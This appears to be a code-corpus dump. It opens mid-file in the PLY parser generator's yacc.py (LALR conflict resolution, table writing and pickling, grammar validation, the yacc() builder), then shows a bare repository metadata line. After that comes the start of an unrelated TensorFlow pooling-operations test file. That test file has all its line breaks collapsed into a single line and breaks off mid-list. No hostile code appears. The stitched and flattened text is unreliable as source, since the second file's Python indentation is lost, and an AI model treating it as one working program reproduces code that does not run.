                                        pp = Productions[p.number]
                                        if oldp.line > pp.line:
                                            st_action[a] = -p.number
                                            st_actionp[a] = p
                                            chosenp,rejectp = pp,oldp
                                            Productions[p.number].reduced += 1
                                            Productions[oldp.number].reduced -= 1
                                        else:
                                            chosenp,rejectp = oldp,pp
                                        self.rr_conflicts.append((st,chosenp,rejectp))
                                        log.info("  ! reduce/reduce conflict for %s resolved using rule %d (%s)", a,st_actionp[a].number, st_actionp[a])
                                    else:
                                        raise LALRError("Unknown conflict in state %d" % st)
                                else:
                                    st_action[a] = -p.number
                                    st_actionp[a] = p
                                    Productions[p.number].reduced += 1
                    else:
                            i = p.lr_index
                            a = p.prod[i+1]       # Get symbol right after the "."
                            if a in self.grammar.Terminals:
                                g = self.lr0_goto(I,a)
                                j = self.lr0_cidhash.get(id(g),-1)
                                if j >= 0:
                                    # We are in a shift state
                                    actlist.append((a,p,"shift and go to state %d" % j))
                                    r = st_action.get(a,None)
                                    if r is not None:
                                        # Whoa have a shift/reduce or shift/shift conflict
                                        if r > 0:
                                            if r != j:
                                                raise LALRError("Shift/shift conflict in state %d" % st)
                                        elif r < 0:
                                            # Do a precedence check.
                                            #   -  if precedence of reduce rule is higher, we reduce.
                                            #   -  if precedence of reduce is same and left assoc, we reduce.
                                            #   -  otherwise we shift
                                            rprec,rlevel = Productions[st_actionp[a].number].prec
                                            sprec,slevel = Precedence.get(a,('right',0))
                                            if (slevel > rlevel) or ((slevel == rlevel) and (rprec == 'right')):
                                                # We decide to shift here... highest precedence to shift
                                                Productions[st_actionp[a].number].reduced -= 1
                                                st_action[a] = j
                                                st_actionp[a] = p
                                                if not rlevel:
                                                    log.info("  ! shift/reduce conflict for %s resolved as shift",a)
                                                    self.sr_conflicts.append((st,a,'shift'))
                                            elif (slevel == rlevel) and (rprec == 'nonassoc'):
                                                st_action[a] = None
                                            else:
                                                # Hmmm. Guess we'll keep the reduce
                                                if not slevel and not rlevel:
                                                    log.info("  ! shift/reduce conflict for %s resolved as reduce",a)
                                                    self.sr_conflicts.append((st,a,'reduce'))

                                        else:
                                            raise LALRError("Unknown conflict in state %d" % st)
                                    else:
                                        st_action[a] = j
                                        st_actionp[a] = p

            # Print the actions associated with each terminal
            _actprint = { }
            for a,p,m in actlist:
                if a in st_action:
                    if p is st_actionp[a]:
                        log.info("    %-15s %s",a,m)
                        _actprint[(a,m)] = 1
            log.info("")
            # Print the actions that were not used. (debugging)
            not_used = 0
            for a,p,m in actlist:
                if a in st_action:
                    if p is not st_actionp[a]:
                        if not (a,m) in _actprint:
                            log.debug("  ! %-15s [ %s ]",a,m)
                            not_used = 1
                            _actprint[(a,m)] = 1
            if not_used:
                log.debug("")

            # Construct the goto table for this state

            nkeys = { }
            for ii in I:
                for s in ii.usyms:
                    if s in self.grammar.Nonterminals:
                        nkeys[s] = None
            for n in nkeys:
                g = self.lr0_goto(I,n)
                j = self.lr0_cidhash.get(id(g),-1)
                if j >= 0:
                    st_goto[n] = j
                    log.info("    %-30s shift and go to state %d",n,j)

            action[st] = st_action
            actionp[st] = st_actionp
            goto[st] = st_goto
            st += 1

    # -----------------------------------------------------------------------------
    # write()
    #
    # This function writes the LR parsing tables to a file
    # -----------------------------------------------------------------------------

    def write_table(self,modulename,outputdir='',signature=""):
        """Write the parse tables as an importable Python module.

        With smaller=1 the action/goto tables are factored by symbol name and
        reassembled at import time, producing a much smaller file.  IOError
        is reported to stderr rather than raised.
        """
        basemodulename = modulename.split(".")[-1]
        filename = os.path.join(outputdir,basemodulename) + ".py"
        try:
            f = open(filename,"w")

            f.write("""
# %s
# This file is automatically generated. Do not edit.
_tabversion = %r

_lr_method = %r

_lr_signature = %r
""" % (filename, __tabversion__, self.lr_method, signature))

            # Change smaller to 0 to go back to original tables
            smaller = 1

            # Factor out names to try and make smaller
            if smaller:
                items = { }

                for s,nd in self.lr_action.items():
                   for name,v in nd.items():
                      i = items.get(name)
                      if not i:
                         i = ([],[])
                         items[name] = i
                      i[0].append(s)
                      i[1].append(v)

                f.write("\n_lr_action_items = {")
                for k,v in items.items():
                    f.write("%r:([" % k)
                    for i in v[0]:
                        f.write("%r," % i)
                    f.write("],[")
                    for i in v[1]:
                        f.write("%r," % i)

                    f.write("]),")
                f.write("}\n")

                f.write("""
_lr_action = { }
for _k, _v in _lr_action_items.items():
   for _x,_y in zip(_v[0],_v[1]):
      if not _x in _lr_action:  _lr_action[_x] = { }
      _lr_action[_x][_k] = _y
del _lr_action_items
""")

            else:
                f.write("\n_lr_action = { ");
                for k,v in self.lr_action.items():
                    f.write("(%r,%r):%r," % (k[0],k[1],v))
                f.write("}\n");

            if smaller:
                # Factor out names to try and make smaller
                items = { }

                for s,nd in self.lr_goto.items():
                   for name,v in nd.items():
                      i = items.get(name)
                      if not i:
                         i = ([],[])
                         items[name] = i
                      i[0].append(s)
                      i[1].append(v)

                f.write("\n_lr_goto_items = {")
                for k,v in items.items():
                    f.write("%r:([" % k)
                    for i in v[0]:
                        f.write("%r," % i)
                    f.write("],[")
                    for i in v[1]:
                        f.write("%r," % i)

                    f.write("]),")
                f.write("}\n")

                f.write("""
_lr_goto = { }
for _k, _v in _lr_goto_items.items():
   for _x,_y in zip(_v[0],_v[1]):
       if not _x in _lr_goto: _lr_goto[_x] = { }
       _lr_goto[_x][_k] = _y
del _lr_goto_items
""")
            else:
                f.write("\n_lr_goto = { ");
                for k,v in self.lr_goto.items():
                    f.write("(%r,%r):%r," % (k[0],k[1],v))
                f.write("}\n");

            # Write production table
            f.write("_lr_productions = [\n")
            for p in self.lr_productions:
                if p.func:
                    f.write("  (%r,%r,%d,%r,%r,%d),\n" % (p.str,p.name, p.len, p.func,p.file,p.line))
                else:
                    f.write("  (%r,%r,%d,None,None,None),\n" % (str(p),p.name, p.len))
            f.write("]\n")

            f.close()

        except IOError:
            e = sys.exc_info()[1]
            sys.stderr.write("Unable to create '%s'\n" % filename)
            sys.stderr.write(str(e)+"\n")
            return

    # -----------------------------------------------------------------------------
    # pickle_table()
    #
    # This function pickles the LR parsing tables to a supplied file object
    # -----------------------------------------------------------------------------

    def pickle_table(self,filename,signature=""):
        """Pickle the tables (version, method, signature, action, goto,
        productions) to *filename* using pickle_protocol."""
        try:
            import cPickle as pickle
        except ImportError:
            import pickle
        outf = open(filename,"wb")
        pickle.dump(__tabversion__,outf,pickle_protocol)
        pickle.dump(self.lr_method,outf,pickle_protocol)
        pickle.dump(signature,outf,pickle_protocol)
        pickle.dump(self.lr_action,outf,pickle_protocol)
        pickle.dump(self.lr_goto,outf,pickle_protocol)
        outp = []
        for p in self.lr_productions:
            if p.func:
                outp.append((p.str,p.name, p.len, p.func,p.file,p.line))
            else:
                outp.append((str(p),p.name,p.len,None,None,None))
        pickle.dump(outp,outf,pickle_protocol)
        outf.close()

# -----------------------------------------------------------------------------
#                            === INTROSPECTION ===
#
# The following functions and classes are used to implement the PLY
# introspection features followed by the yacc() function itself.
# -----------------------------------------------------------------------------

# -----------------------------------------------------------------------------
# get_caller_module_dict()
#
# This function returns a dictionary containing all of the symbols defined within
# a caller further down the call stack.  This is used to get the environment
# associated with the yacc() call if none was provided.
# -----------------------------------------------------------------------------

def get_caller_module_dict(levels):
    """Return a dict of the symbols visible *levels* frames up the stack.

    Raising and catching an exception gives us a traceback whose tb_frame is
    the current frame; we then hop outward.  Globals are copied first, then
    overlaid with locals (when they differ), so local definitions win.
    """
    try:
        raise RuntimeError
    except RuntimeError:
        exc_type, exc_val, tb = sys.exc_info()
        frame = tb.tb_frame
        for _ in range(levels):
            frame = frame.f_back
        symbols = frame.f_globals.copy()
        if frame.f_globals != frame.f_locals:
            symbols.update(frame.f_locals)
        return symbols

# -----------------------------------------------------------------------------
# parse_grammar()
#
# This takes a raw grammar rule string and parses it into production data
# -----------------------------------------------------------------------------
def parse_grammar(doc,file,line):
    """Parse a grammar docstring into a list of (file, line, name, syms).

    Each non-blank line is either "name : sym sym ..." (also accepts '::=')
    or a "| sym sym ..." continuation of the previous rule.  Malformed lines
    raise SyntaxError with a file:line prefix.
    """
    grammar = []
    lastp = None          # name of the most recent rule, for '|' continuations
    dline = line
    for ps in doc.splitlines():
        dline += 1
        pieces = ps.split()
        if not pieces:
            continue
        try:
            if pieces[0] == '|':
                # Continuation of the previous rule
                if lastp is None:
                    raise SyntaxError("%s:%d: Misplaced '|'" % (file,dline))
                prodname = lastp
                syms = pieces[1:]
            else:
                prodname = pieces[0]
                lastp = prodname
                syms = pieces[2:]
                assign = pieces[1]
                if assign not in (':', '::='):
                    raise SyntaxError("%s:%d: Syntax error. Expected ':'" % (file,dline))

            grammar.append((file,dline,prodname,syms))
        except SyntaxError:
            raise
        except Exception:
            # Anything else (e.g. a rule line with no ':' token) is reported
            # as a syntax error at this line.
            raise SyntaxError("%s:%d: Syntax error in rule '%s'" % (file,dline,ps.strip()))

    return grammar

# -----------------------------------------------------------------------------
# ParserReflect()
#
# This class represents information extracted for building a parser including
# start symbol, error function, tokens, precedence list, action functions,
# etc.
# -----------------------------------------------------------------------------

class ParserReflect(object):
    """Collects and validates everything needed to build a parser from a
    module dictionary: start symbol, p_error, tokens, precedence and the
    p_* action functions.  self.error is set nonzero on any problem.
    """

    def __init__(self,pdict,log=None):
        self.pdict      = pdict        # symbol table of the defining module
        self.start      = None
        self.error_func = None
        self.tokens     = None
        self.files      = {}           # source files referenced (for validate_files)
        self.grammar    = []           # [(funcname, (file,line,prodname,syms)), ...]
        self.error      = 0

        if log is None:
            self.log = PlyLogger(sys.stderr)
        else:
            self.log = log

    # Get all of the basic information
    def get_all(self):
        self.get_start()
        self.get_error_func()
        self.get_tokens()
        self.get_precedence()
        self.get_pfunctions()

    # Validate all of the information
    def validate_all(self):
        self.validate_start()
        self.validate_error_func()
        self.validate_tokens()
        self.validate_precedence()
        self.validate_pfunctions()
        self.validate_files()
        return self.error

    # Compute a signature over the grammar
    def signature(self):
        """Return an MD5 digest of start symbol, precedence, tokens and rule
        docstrings; used to detect when cached tables are stale."""
        try:
            from hashlib import md5
        except ImportError:
            from md5 import md5
        try:
            sig = md5()
            if self.start:
                sig.update(self.start.encode('latin-1'))
            if self.prec:
                sig.update("".join(["".join(p) for p in self.prec]).encode('latin-1'))
            if self.tokens:
                sig.update(" ".join(self.tokens).encode('latin-1'))
            for f in self.pfuncs:
                if f[3]:
                    sig.update(f[3].encode('latin-1'))
        except (TypeError,ValueError):
            pass
        return sig.digest()

    # -----------------------------------------------------------------------------
    # validate_file()
    #
    # This method checks to see if there are duplicated p_rulename() functions
    # in the parser module file.  Without this function, it is really easy for
    # users to make mistakes by cutting and pasting code fragments (and it's a real
    # bugger to try and figure out why the resulting parser doesn't work).  Therefore,
    # we just do a little regular expression pattern matching of def statements
    # to try and detect duplicates.
    # -----------------------------------------------------------------------------

    def validate_files(self):
        # Match def p_funcname(
        fre = re.compile(r'\s*def\s+(p_[a-zA-Z_0-9]*)\(')

        for filename in self.files.keys():
            base,ext = os.path.splitext(filename)
            if ext != '.py': return 1          # No idea. Assume it's okay.

            try:
                f = open(filename)
                lines = f.readlines()
                f.close()
            except IOError:
                continue                       # source not readable; skip the check

            counthash = { }
            for linen,l in enumerate(lines):
                linen += 1
                m = fre.match(l)
                if m:
                    name = m.group(1)
                    prev = counthash.get(name)
                    if not prev:
                        counthash[name] = linen
                    else:
                        self.log.warning("%s:%d: Function %s redefined. Previously defined on line %d", filename,linen,name,prev)

    # Get the start symbol
    def get_start(self):
        self.start = self.pdict.get('start')

    # Validate the start symbol
    def validate_start(self):
        if self.start is not None:
            if not isinstance(self.start,str):
                self.log.error("'start' must be a string")

    # Look for error handler
    def get_error_func(self):
        self.error_func = self.pdict.get('p_error')

    # Validate the error function
    def validate_error_func(self):
        if self.error_func:
            if isinstance(self.error_func,types.FunctionType):
                ismethod = 0
            elif isinstance(self.error_func, types.MethodType):
                ismethod = 1
            else:
                self.log.error("'p_error' defined, but is not a function or method")
                self.error = 1
                return

            eline = func_code(self.error_func).co_firstlineno
            efile = func_code(self.error_func).co_filename
            self.files[efile] = 1

            # p_error takes exactly one argument (plus self for methods)
            if (func_code(self.error_func).co_argcount != 1+ismethod):
                self.log.error("%s:%d: p_error() requires 1 argument",efile,eline)
                self.error = 1

    # Get the tokens map
    def get_tokens(self):
        tokens = self.pdict.get("tokens",None)
        if not tokens:
            self.log.error("No token list is defined")
            self.error = 1
            return

        if not isinstance(tokens,(list, tuple)):
            self.log.error("tokens must be a list or tuple")
            self.error = 1
            return

        if not tokens:
            self.log.error("tokens is empty")
            self.error = 1
            return

        self.tokens = tokens

    # Validate the tokens
    def validate_tokens(self):
        # Validate the tokens.
        if 'error' in self.tokens:
            self.log.error("Illegal token name 'error'. Is a reserved word")
            self.error = 1
            return

        terminals = {}
        for n in self.tokens:
            if n in terminals:
                self.log.warning("Token '%s' multiply defined", n)
            terminals[n] = 1

    # Get the precedence map (if any)
    def get_precedence(self):
        self.prec = self.pdict.get("precedence",None)

    # Validate and parse the precedence map
    def validate_precedence(self):
        """Flatten the user's precedence table into self.preclist as
        (term, assoc, level) tuples, level starting at 1."""
        preclist = []
        if self.prec:
            if not isinstance(self.prec,(list,tuple)):
                self.log.error("precedence must be a list or tuple")
                self.error = 1
                return
            for level,p in enumerate(self.prec):
                if not isinstance(p,(list,tuple)):
                    self.log.error("Bad precedence table")
                    self.error = 1
                    return

                if len(p) < 2:
                    self.log.error("Malformed precedence entry %s. Must be (assoc, term, ..., term)",p)
                    self.error = 1
                    return
                assoc = p[0]
                if not isinstance(assoc,str):
                    self.log.error("precedence associativity must be a string")
                    self.error = 1
                    return
                for term in p[1:]:
                    if not isinstance(term,str):
                        self.log.error("precedence items must be strings")
                        self.error = 1
                        return
                    preclist.append((term,assoc,level+1))
        self.preclist = preclist

    # Get all p_functions from the grammar
    def get_pfunctions(self):
        p_functions = []
        for name, item in self.pdict.items():
            if name[:2] != 'p_': continue
            if name == 'p_error': continue
            if isinstance(item,(types.FunctionType,types.MethodType)):
                line = func_code(item).co_firstlineno
                file = func_code(item).co_filename
                p_functions.append((line,file,name,item.__doc__))

        # Sort all of the actions by line number
        p_functions.sort()
        self.pfuncs = p_functions

    # Validate all of the p_functions
    def validate_pfunctions(self):
        """Check every p_ rule function's arity and docstring, parse the
        docstrings into self.grammar, and warn about likely mistakes
        (non-function p_ names, rule-shaped functions missing the prefix)."""
        grammar = []
        # Check for non-empty symbols
        if len(self.pfuncs) == 0:
            self.log.error("no rules of the form p_rulename are defined")
            self.error = 1
            return

        for line, file, name, doc in self.pfuncs:
            func = self.pdict[name]
            if isinstance(func, types.MethodType):
                reqargs = 2
            else:
                reqargs = 1
            if func_code(func).co_argcount > reqargs:
                self.log.error("%s:%d: Rule '%s' has too many arguments",file,line,func.__name__)
                self.error = 1
            elif func_code(func).co_argcount < reqargs:
                self.log.error("%s:%d: Rule '%s' requires an argument",file,line,func.__name__)
                self.error = 1
            elif not func.__doc__:
                self.log.warning("%s:%d: No documentation string specified in function '%s' (ignored)",file,line,func.__name__)
            else:
                try:
                    parsed_g = parse_grammar(doc,file,line)
                    for g in parsed_g:
                        grammar.append((name, g))
                except SyntaxError:
                    e = sys.exc_info()[1]
                    self.log.error(str(e))
                    self.error = 1

                # Looks like a valid grammar rule
                # Mark the file in which defined.
                self.files[file] = 1

        # Secondary validation step that looks for p_ definitions that are not functions
        # or functions that look like they might be grammar rules.

        for n,v in self.pdict.items():
            if n[0:2] == 'p_' and isinstance(v, (types.FunctionType, types.MethodType)): continue
            if n[0:2] == 't_': continue
            if n[0:2] == 'p_' and n != 'p_error':
                self.log.warning("'%s' not defined as a function", n)
            if ((isinstance(v,types.FunctionType) and func_code(v).co_argcount == 1) or
                (isinstance(v,types.MethodType) and func_code(v).co_argcount == 2)):
                try:
                    doc = v.__doc__.split(" ")
                    if doc[1] == ':':
                        self.log.warning("%s:%d: Possible grammar rule '%s' defined without p_ prefix",
                                         func_code(v).co_filename, func_code(v).co_firstlineno,n)
                except Exception:
                    pass

        self.grammar = grammar

# -----------------------------------------------------------------------------
# yacc(module)
#
# Build a parser
# -----------------------------------------------------------------------------

def yacc(method='LALR', debug=yaccdebug, module=None, tabmodule=tab_module, start=None,
         check_recursion=1, optimize=0, write_tables=1, debugfile=debug_file,outputdir='',
         debuglog=None, errorlog = None, picklefile=None):
    """Build and return an LRParser from the calling module (or *module*).

    Cached tables (tabmodule or picklefile) are reused when their recorded
    signature matches the current grammar; otherwise the grammar is
    validated, tables are regenerated, and optionally written back out.
    Raises YaccError if the parser cannot be built.
    """

    global parse                 # Reference to the parsing method of the last built parser

    # If pickling is enabled, table files are not created

    if picklefile:
        write_tables = 0

    if errorlog is None:
        errorlog = PlyLogger(sys.stderr)

    # Get the module dictionary used for the parser
    if module:
        _items = [(k,getattr(module,k)) for k in dir(module)]
        pdict = dict(_items)
    else:
        pdict = get_caller_module_dict(2)

    # Collect parser information from the dictionary
    pinfo = ParserReflect(pdict,log=errorlog)
    pinfo.get_all()

    if pinfo.error:
        raise YaccError("Unable to build parser")

    # Check signature against table files (if any)
    signature = pinfo.signature()

    # Read the tables
    try:
        lr = LRTable()
        if picklefile:
            read_signature = lr.read_pickle(picklefile)
        else:
            read_signature = lr.read_table(tabmodule)
        if optimize or (read_signature == signature):
            try:
                lr.bind_callables(pinfo.pdict)
                parser = LRParser(lr,pinfo.error_func)
                parse = parser.parse
                return parser
            except Exception:
                e = sys.exc_info()[1]
                errorlog.warning("There was a problem loading the table file: %s", repr(e))
    except VersionError:
        e = sys.exc_info()
        errorlog.warning(str(e))
    except Exception:
        # Any failure reading cached tables just means we regenerate below.
        pass

    if debuglog is None:
        if debug:
            debuglog = PlyLogger(open(debugfile,"w"))
        else:
            debuglog = NullLogger()

    debuglog.info("Created by PLY version %s (http://www.dabeaz.com/ply)", __version__)

    errors = 0

    # Validate the parser information
    if pinfo.validate_all():
        raise YaccError("Unable to build parser")

    if not pinfo.error_func:
        errorlog.warning("no p_error() function is defined")

    # Create a grammar object
    grammar = Grammar(pinfo.tokens)

    # Set precedence level for terminals
    for term, assoc, level in pinfo.preclist:
        try:
            grammar.set_precedence(term,assoc,level)
        except GrammarError:
            e = sys.exc_info()[1]
            errorlog.warning("%s",str(e))

    # Add productions to the grammar
    for funcname, gram in pinfo.grammar:
        file, line, prodname, syms = gram
        try:
            grammar.add_production(prodname,syms,funcname,file,line)
        except GrammarError:
            e = sys.exc_info()[1]
            errorlog.error("%s",str(e))
            errors = 1

    # Set the grammar start symbols
    try:
        if start is None:
            grammar.set_start(pinfo.start)
        else:
            grammar.set_start(start)
    except GrammarError:
        e = sys.exc_info()[1]
        errorlog.error(str(e))
        errors = 1

    if errors:
        raise YaccError("Unable to build parser")

    # Verify the grammar structure
    undefined_symbols = grammar.undefined_symbols()
    for sym, prod in undefined_symbols:
        errorlog.error("%s:%d: Symbol '%s' used, but not defined as a token or a rule",prod.file,prod.line,sym)
        errors = 1

    unused_terminals = grammar.unused_terminals()
    if unused_terminals:
        debuglog.info("")
        debuglog.info("Unused terminals:")
        debuglog.info("")
        for term in unused_terminals:
            errorlog.warning("Token '%s' defined, but not used", term)
            debuglog.info("    %s", term)

    # Print out all productions to the debug log
    if debug:
        debuglog.info("")
        debuglog.info("Grammar")
        debuglog.info("")
        for n,p in enumerate(grammar.Productions):
            debuglog.info("Rule %-5d %s", n, p)

    # Find unused non-terminals
    unused_rules = grammar.unused_rules()
    for prod in unused_rules:
        errorlog.warning("%s:%d: Rule '%s' defined, but not used", prod.file, prod.line, prod.name)

    if len(unused_terminals) == 1:
        errorlog.warning("There is 1 unused token")
    if len(unused_terminals) > 1:
        errorlog.warning("There are %d unused tokens", len(unused_terminals))

    if len(unused_rules) == 1:
        errorlog.warning("There is 1 unused rule")
    if len(unused_rules) > 1:
        errorlog.warning("There are %d unused rules", len(unused_rules))

    if debug:
        debuglog.info("")
        debuglog.info("Terminals, with rules where they appear")
        debuglog.info("")
        terms = list(grammar.Terminals)
        terms.sort()
        for term in terms:
            debuglog.info("%-20s : %s", term, " ".join([str(s) for s in grammar.Terminals[term]]))

        debuglog.info("")
        debuglog.info("Nonterminals, with rules where they appear")
        debuglog.info("")
        nonterms = list(grammar.Nonterminals)
        nonterms.sort()
        for nonterm in nonterms:
            debuglog.info("%-20s : %s", nonterm, " ".join([str(s) for s in grammar.Nonterminals[nonterm]]))
        debuglog.info("")

    if check_recursion:
        unreachable = grammar.find_unreachable()
        for u in unreachable:
            errorlog.warning("Symbol '%s' is unreachable",u)

        infinite = grammar.infinite_cycles()
        for inf in infinite:
            errorlog.error("Infinite recursion detected for symbol '%s'", inf)
            errors = 1

    unused_prec = grammar.unused_precedence()
    for term, assoc in unused_prec:
        errorlog.error("Precedence rule '%s' defined for unknown symbol '%s'", assoc, term)
        errors = 1

    if errors:
        raise YaccError("Unable to build parser")

    # Run the LRGeneratedTable on the grammar
    if debug:
        errorlog.debug("Generating %s tables", method)

    lr = LRGeneratedTable(grammar,method,debuglog)

    if debug:
        num_sr = len(lr.sr_conflicts)

        # Report shift/reduce and reduce/reduce conflicts
        if num_sr == 1:
            errorlog.warning("1 shift/reduce conflict")
        elif num_sr > 1:
            errorlog.warning("%d shift/reduce conflicts", num_sr)

        num_rr = len(lr.rr_conflicts)
        if num_rr == 1:
            errorlog.warning("1 reduce/reduce conflict")
        elif num_rr > 1:
            errorlog.warning("%d reduce/reduce conflicts", num_rr)

    # Write out conflicts to the output file
    if debug and (lr.sr_conflicts or lr.rr_conflicts):
        debuglog.warning("")
        debuglog.warning("Conflicts:")
        debuglog.warning("")

        for state, tok, resolution in lr.sr_conflicts:
            debuglog.warning("shift/reduce conflict for %s in state %d resolved as %s",  tok, state, resolution)

        already_reported = {}
        for state, rule, rejected in lr.rr_conflicts:
            if (state,id(rule),id(rejected)) in already_reported:
                continue
            debuglog.warning("reduce/reduce conflict in state %d resolved using rule (%s)", state, rule)
            debuglog.warning("rejected rule (%s) in state %d", rejected,state)
            errorlog.warning("reduce/reduce conflict in state %d resolved using rule (%s)", state, rule)
            errorlog.warning("rejected rule (%s) in state %d", rejected, state)
            already_reported[state,id(rule),id(rejected)] = 1

        warned_never = []
        for state, rule, rejected in lr.rr_conflicts:
            if not rejected.reduced and (rejected not in warned_never):
                debuglog.warning("Rule (%s) is never reduced", rejected)
                errorlog.warning("Rule (%s) is never reduced", rejected)
                warned_never.append(rejected)

    # Write the table file if requested
    if write_tables:
        lr.write_table(tabmodule,outputdir,signature)

    # Write a pickled version of the tables
    if picklefile:
        lr.pickle_table(picklefile,signature)

    # Build the parser
    lr.bind_callables(pinfo.pdict)
    parser = LRParser(lr,pinfo.error_func)

    parse = parser.parse
    return parser
mpl-2.0
brendandburns/tensorflow
tensorflow/python/kernel_tests/pooling_ops_test.py
5
36678
"""Functional tests for pooling operations.""" from __future__ import print_function import tensorflow.python.platform import numpy as np import tensorflow as tf from tensorflow.python.kernel_tests import gradient_checker as gc from tensorflow.python.ops import gen_nn_ops def GetInceptionMaxPoolShapes(): """Iterator for some of the max pool ops in the Inception 2015 model. Yields: Tuple (name, input_size, filter_size, out_size, strides, padding) """ names = ["maxpool2", "maxpool3", "maxpool4", "maxpool5"] input_sizes = [[32, 71, 71, 192], [32, 35, 35, 288], [32, 17, 17, 1248], [32, 8, 8, 2048]] filter_sizes = [[1, 3, 3, 1], [1, 3, 3, 1], [1, 3, 3, 1], [1, 3, 3, 1]] output_sizes = [[32, 35, 35, 192], [32, 17, 17, 288], [32, 8, 8, 1248], [32, 8, 8, 2048]] strides = [[1, 2, 2, 1], [1, 2, 2, 1], [1, 2, 2, 1], [1, 1, 1, 1]] paddings = ["VALID", "VALID", "VALID", "SAME"] for n, i, f, o, s, p in zip(names, input_sizes, filter_sizes, output_sizes, strides, paddings): yield n, i, f, o, s, p class PoolingTest(tf.test.TestCase): def _VerifyValues(self, pool_func, input_sizes, ksize, strides, padding, expected, use_gpu): """Verifies the output values of the pooling function. Args: pool_func: Function to be called, co.MaxPool, co.AvgPool, or the Lua version. input_sizes: Input tensor dimensions. ksize: The kernel size dimensions strides: The stride dimensions padding: Padding type. expected: An array containing the expected operation outputs. use_gpu: Whether we are running on GPU. """ total_size = 1 for s in input_sizes: total_size *= s # Initializes the input tensor with array containing incrementing # numbers from 1. 
x = [f * 1.0 for f in range(1, total_size + 1)] with self.test_session(use_gpu=use_gpu) as sess: t = tf.constant(x, shape=input_sizes) t = pool_func(t, ksize=ksize, strides=strides, padding=padding) actual = t.eval() self.assertAllClose(expected, actual.flatten()) self.assertShapeEqual(actual, t) def _testAvgPoolValidPadding(self, use_gpu): expected_output = [7.0, 8.0, 9.0] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 3, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="VALID", expected=expected_output, use_gpu=use_gpu) def _testAvgPoolSamePadding(self, use_gpu): expected_output = [8.5, 9.5, 10.5, 14.5, 15.5, 16.5] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 2, 4, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testAvgPoolSamePaddingNonSquareWindow(self, use_gpu): # input is: # [1.0, 2.0 # 3.0 4.0] # # Window of [x, x] should do: # [avg(1.0, 2.0), avg(2.0, padded0), # avg(3.0, 4.0), avg(4.0, padded0)] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 2, 2, 1], ksize=[1, 1, 2, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[1.5, 2.0, 3.5, 4.0], use_gpu=use_gpu) # Window of [x, # x] should do: # [avg(1.0, 3.0), avg(2.0, 4.0) # avg(3.0, padded0), avg(4.0, padded0)] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 2, 2, 1], ksize=[1, 2, 1, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[2.0, 3.0, 3.0, 4.0], use_gpu=use_gpu) def _testAvgPoolSamePaddingNonSquareWindowMultiBatch(self, use_gpu): self._VerifyValues(tf.nn.avg_pool, input_sizes=[2, 2, 2, 2], ksize=[1, 1, 2, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[2.0, 3.0, 3.0, 4.0, 6.0, 7.0, 7.0, 8.0, 10.0, 11.0, 11.0, 12.0, 14.0, 15.0, 15.0, 16.0], use_gpu=use_gpu) self._VerifyValues(tf.nn.avg_pool, input_sizes=[2, 2, 2, 2], ksize=[1, 2, 1, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[3.0, 4.0, 5.0, 6.0, 5.0, 6.0, 7.0, 8.0, 11.0, 12.0, 13.0, 14.0, 13.0, 14.0, 15.0, 16.0], use_gpu=use_gpu) def 
_testAvgPoolValidPaddingUnevenStride(self, use_gpu): self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 3, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 1, 2, 1], padding="VALID", expected=[7.0, 8.0, 9.0, 16.0, 17.0, 18.0], use_gpu=use_gpu) self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 3, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 1, 1], padding="VALID", expected=[7.0, 8.0, 9.0, 10.0, 11.0, 12.0], use_gpu=use_gpu) def _testAvgPoolSamePadding4(self, use_gpu): expected_output = [11.0, 12.0, 13.0, 14.0, 19.0, 20.0, 21.0, 22.0, 43.0, 44.0, 45.0, 46.0, 51.0, 52.0, 53.0, 54.0] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 4, 4, 4], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testAvgPoolSamePaddingPacket4(self, use_gpu): expected_output = [21.0, 22.0, 23.0, 24.0, 27.0, 28.0, 29.0, 30.0, 45.0, 46.0, 47.0, 48.0, 51.0, 52.0, 53.0, 54.0] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 4, 4, 4], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testAvgPoolSamePaddingPacket8(self, use_gpu): expected_output = [73.0, 74.0, 75.0, 76.0, 77.0, 78.0, 79.0, 80.0, 89.0, 90.0, 91.0, 92.0, 93.0, 94.0, 95.0, 96.0, 105.0, 106.0, 107.0, 108.0, 109.0, 110.0, 111.0, 112.0, 117.0, 118.0, 119.0, 120.0, 121.0, 122.0, 123.0, 124.0, 201.0, 202.0, 203.0, 204.0, 205.0, 206.0, 207.0, 208.0, 217.0, 218.0, 219.0, 220.0, 221.0, 222.0, 223.0, 224.0, 233.0, 234.0, 235.0, 236.0, 237.0, 238.0, 239.0, 240.0, 245.0, 246.0, 247.0, 248.0, 249.0, 250.0, 251.0, 252.0, 329.0, 330.0, 331.0, 332.0, 333.0, 334.0, 335.0, 336.0, 345.0, 346.0, 347.0, 348.0, 349.0, 350.0, 351.0, 352.0, 361.0, 362.0, 363.0, 364.0, 365.0, 366.0, 367.0, 368.0, 373.0, 374.0, 375.0, 376.0, 377.0, 378.0, 379.0, 380.0, 425.0, 426.0, 427.0, 428.0, 429.0, 430.0, 431.0, 432.0, 441.0, 442.0, 443.0, 444.0, 445.0, 446.0, 447.0, 448.0, 457.0, 458.0, 459.0, 460.0, 461.0, 462.0, 463.0, 464.0, 469.0, 470.0, 471.0, 472.0, 473.0, 
